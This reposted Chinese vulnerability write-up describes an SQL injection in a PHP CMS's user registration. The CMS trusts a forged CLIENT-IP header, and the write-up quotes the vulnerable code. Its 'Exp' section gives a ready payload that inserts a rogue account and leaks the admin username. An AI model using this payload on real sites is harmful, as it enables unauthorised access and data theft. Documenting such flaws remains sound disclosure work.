来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 相关文章:http://www.2cto.com/Article/201211/168584.html漏洞文件:Client.Class.php 29行处public static function get_user_ip() { if(getenv(#39;HTTP_CLIENT_IP#39;) strcasec......
相关文章:http://www.2cto.com/Article/201211/168584.html
漏洞文件:Client.Class.php 29行处 public static function get_user_ip() {
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$onlineip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$onlineip = $_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}
www.2cto.com
/* 显然可以伪造一个client_ip进行注入 */RegsiterController.php 145行处
private function reg($data) {
if (empty($data)) return false;
$data['groupid'] = 1;
$data['regdate'] = time();
$data['regip'] = client::get_user_ip();//使用了get_user_ip的方法,漏洞就此产生.
$data['status'] = $this->memberconfig['status'] ? 0 : 1;
$data['modelid'] = (!isset($data['modelid']) || empty($data['modelid'])) ? $this->memberconfig['modelid'] : $data['modelid'];
if (!isset($this->membermodel[$data['modelid']])) $this->memberMsg('会员模型不存在,请联系管理员。');
if ($this->memberconfig['uc_use'] == 1) {
if (uc_get_user($data['username'])) {
$this->memberMsg('该用户无需注册,请直接登录激活!', url('member/login'), 1);
}
$uid = uc_user_register($data['username'], $data['password'], $data['email']);
if ($uid <= 0) {
if ($uid == -1) {
$this->memberMsg('用户名不合法');
} elseif($uid == -2) {
$this->memberMsg('包含要允许注册的词语');
} elseif($uid == -3) {
$this->memberMsg('用户名已经存在');
} elseif($uid == -4) {
$this->memberMsg('Email 格式有误');
} elseif($uid == -5) {
$this->memberMsg('Email 不允许注册');
} elseif($uid == -6) {
$this->memberMsg('该 Email 已经被注册');
} else {
$this->memberMsg('未定义');
}
} else {
$username = $data['username'];
}
}
$data['password'] = md5($data['password']);
$userid = $this->member->insert($data);
return $userid;
}
Exp: 提交用户注册的时候,伪造一个client_ip,内容如下:
sb','1','6'),('hell','1b192f49ddec03d0c7e777d3e578cebf',(select username from fn_user where userid=1),'1','11111','sbd','1','6')#
成功之后,登陆用户:hell,密码:sbdan. 邮箱处就有管理员的user了.
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com